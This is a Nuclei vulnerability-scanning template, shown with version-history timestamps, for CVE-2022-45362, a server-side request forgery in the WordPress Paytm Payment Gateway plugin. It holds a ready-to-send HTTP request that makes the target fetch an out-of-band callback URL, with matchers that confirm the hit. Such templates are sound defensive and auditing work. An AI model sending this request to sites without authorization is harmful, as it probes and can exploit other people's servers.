nuclei-templates/http/cves/2022/CVE-2022-45362.yaml

42 lines
1.4 KiB
YAML
Raw Normal View History

2022-12-22 10:17:57 +00:00
id: CVE-2022-45362
info:
name: WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery
2022-12-22 10:17:57 +00:00
author: theamanrawat
severity: high
description: WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-12-22 10:17:57 +00:00
reference:
- https://patchstack.com/database/vulnerability/paytm-payments/wordpress-paytm-payment-gateway-plugin-2-7-0-server-side-request-forgery-ssrf-vulnerability
- https://wordpress.org/plugins/paytm-payments/
- https://nvd.nist.gov/vuln/detail/CVE-2022-45362
2022-12-22 10:20:55 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2022-45362
2022-12-23 10:51:17 +00:00
metadata:
max-request: 1
2022-12-23 10:51:17 +00:00
verified: true
2022-12-23 12:39:05 +00:00
tags: cve,cve2022,ssrf,wordpress,wp-plugin,wp,paytm-payments,unauth,oast,paytm
2022-12-22 10:17:57 +00:00
http:
2022-12-22 10:17:57 +00:00
- raw:
- |
GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
2023-03-17 09:25:05 +00:00
matchers-condition: and
2022-12-22 10:17:57 +00:00
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
2022-12-23 10:25:03 +00:00
- type: word
part: body
words:
- "paytm-payments.css"
2022-12-22 10:17:57 +00:00
- type: status
status:
2022-12-23 10:25:03 +00:00
- 200